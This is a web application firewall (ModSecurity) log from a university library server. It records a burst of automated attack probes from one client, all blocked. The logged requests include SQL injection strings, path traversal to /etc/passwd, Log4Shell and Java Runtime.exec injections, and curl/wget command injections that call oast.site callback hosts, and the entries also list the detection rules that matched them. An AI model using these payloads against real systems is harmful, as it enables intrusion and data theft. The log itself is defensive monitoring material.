[Tue Aug 29 11:30:47.385689 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAOOuZQAAAAW"]
[Tue Aug 29 11:30:47.563457 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAPmhNsAAAAV"]
[Tue Aug 29 11:30:47.570330 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAPv-HUAAAAM"]
[Tue Aug 29 11:30:48.305317 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAP05GIAAAAA"]
[Tue Aug 29 11:30:48.307617 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlgahw5n4pq7rh6x.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAPpWeoAAAAI"]
[Tue Aug 29 11:30:50.317156 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10esCo-f0AAAPDn1AAAAAP"]
[Tue Aug 29 11:30:50.416258 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAPiBjkAAAAB"]
[Tue Aug 29 11:30:51.327308 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlgnda8wkzaag57n.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAPOhbYAAAAa"]
[Tue Aug 29 11:30:51.355010 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAPDn1QAAAAP"]
[Tue Aug 29 11:30:52.380585 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAOM4aAAAAAU"]
[Tue Aug 29 11:30:52.407290 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAP05GcAAAAA"]
[Tue Aug 29 11:30:53.360099 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAPOhcEAAAAa"]
[Tue Aug 29 11:30:53.559866 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/account"] [unique_id "ZO10fcCo-f0AAAOM4agAAAAU"]
[Tue Aug 29 11:30:54.320046 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAO8794AAAAF"]
[Tue Aug 29 11:30:54.435681 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10fsCo-f0AAAN@5AsAAAAO"]
[Tue Aug 29 11:30:54.540459 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAO87@cAAAAF"]
[Tue Aug 29 11:30:55.403399 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10f8Co-f0AAAP05HEAAAAA"]
[Tue Aug 29 11:30:56.315682 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAPLwBoAAAAX"]
[Tue Aug 29 11:30:56.331279 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAPxBWQAAAAS"]
[Tue Aug 29 11:30:58.379320 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAPPSz8AAAAd"]
[Tue Aug 29 11:30:58.518100 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10gsCo-f0AAAPDn3UAAAAP"]
[Tue Aug 29 11:30:59.376205 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlgrx8mdq1q44qpf.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAN@5CQAAAAO"]
[Tue Aug 29 11:30:59.472551 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10g8Co-f0AAAPLwC8AAAAX"]
[Tue Aug 29 11:31:01.544214 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO10hcCo-f0AAAP05JAAAAAA"]
[Tue Aug 29 11:31:03.709440 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlgfbe4jorc4gngh.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10h8Co-f0AAAP4H9IAAAAI"]
[Tue Aug 29 11:31:04.691683 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgnodjbykcqdkan.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlgnodjbykcqdkan.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAP4H94AAAAI"]
[Tue Aug 29 11:31:04.733853 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgohcq7tpupzjgf.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAP4H@AAAAAI"]
[Tue Aug 29 11:31:05.000761 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10iMCo-f0AAAQEGFEAAAAm"]
[Tue Aug 29 11:31:05.736423 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "digilibft.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAP9HgIAAAAW"]
[Tue Aug 29 11:31:06.316352 2023] [:error] [pid 1030] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAQGldsAAAAo"]
